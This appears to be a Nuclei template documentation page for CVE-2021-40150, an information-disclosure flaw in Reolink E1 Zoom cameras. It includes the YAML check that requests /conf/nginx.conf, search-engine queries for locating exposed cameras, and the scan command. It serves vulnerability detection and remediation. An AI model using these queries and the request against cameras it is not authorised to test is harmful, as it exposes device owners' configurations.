Reolink E1 Zoom Camera <=3.0.0.716 - Information Disclosure
ID: CVE-2021-40150
Severity: high
Author: For3stCo1d
Tags: cve2021,cve,reolink,camera,exposure,iot
Description
Section titled “Description”Reolink E1 Zoom camera through 3.0.0.716 is susceptible to information disclosure. The web server discloses its configuration via the /conf/ directory that is mapped to a publicly accessible path. An attacker with network-level access to the camera can can download the entire NGINX/FastCGI configurations by querying the /conf/nginx.conf or /conf/fastcgi.conf URI.
YAML Source
Section titled “YAML Source”id: CVE-2021-40150
info: name: Reolink E1 Zoom Camera <=3.0.0.716 - Information Disclosure author: For3stCo1d severity: high description: | Reolink E1 Zoom camera through 3.0.0.716 is susceptible to information disclosure. The web server discloses its configuration via the /conf/ directory that is mapped to a publicly accessible path. An attacker with network-level access to the camera can can download the entire NGINX/FastCGI configurations by querying the /conf/nginx.conf or /conf/fastcgi.conf URI. impact: | An attacker can exploit this vulnerability to gain access to sensitive information, potentially compromising user privacy and security. remediation: | Upgrade the Reolink E1 Zoom Camera to a version higher than 3.0.0.716 to mitigate the information disclosure vulnerability (CVE-2021-40150). reference: - https://dl.packetstormsecurity.net/2206-exploits/reolinke1config-disclose.txt - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40150.txt - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40150 - https://nvd.nist.gov/vuln/detail/CVE-2021-40150 - https://github.com/ARPSyndicate/cvemon classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-40150 cwe-id: CWE-552 epss-score: 0.01099 epss-percentile: 0.82891 cpe: cpe:2.3:o:reolink:e1_zoom_firmware:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: reolink product: e1_zoom_firmware shodan-query: - http.title:"Reolink" - http.title:"reolink" fofa-query: title="reolink" google-query: intitle:"reolink" tags: cve2021,cve,reolink,camera,exposure,iot
http: - method: GET path: - "{{BaseURL}}/conf/nginx.conf"
matchers-condition: and matchers: - type: word words: - "server" - "listen" - "fastcgi" condition: and
- type: status status: - 200# digest: 4a0a00473045022100c0d7320aef28bc4c99e77a8de005a186d74febdfbea1fd077ca27988805982fa02206ff3516deeb932b32686afd35167a7a81da4293dd77a9c2fbd7b0f654722e9b7:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-40150.yaml"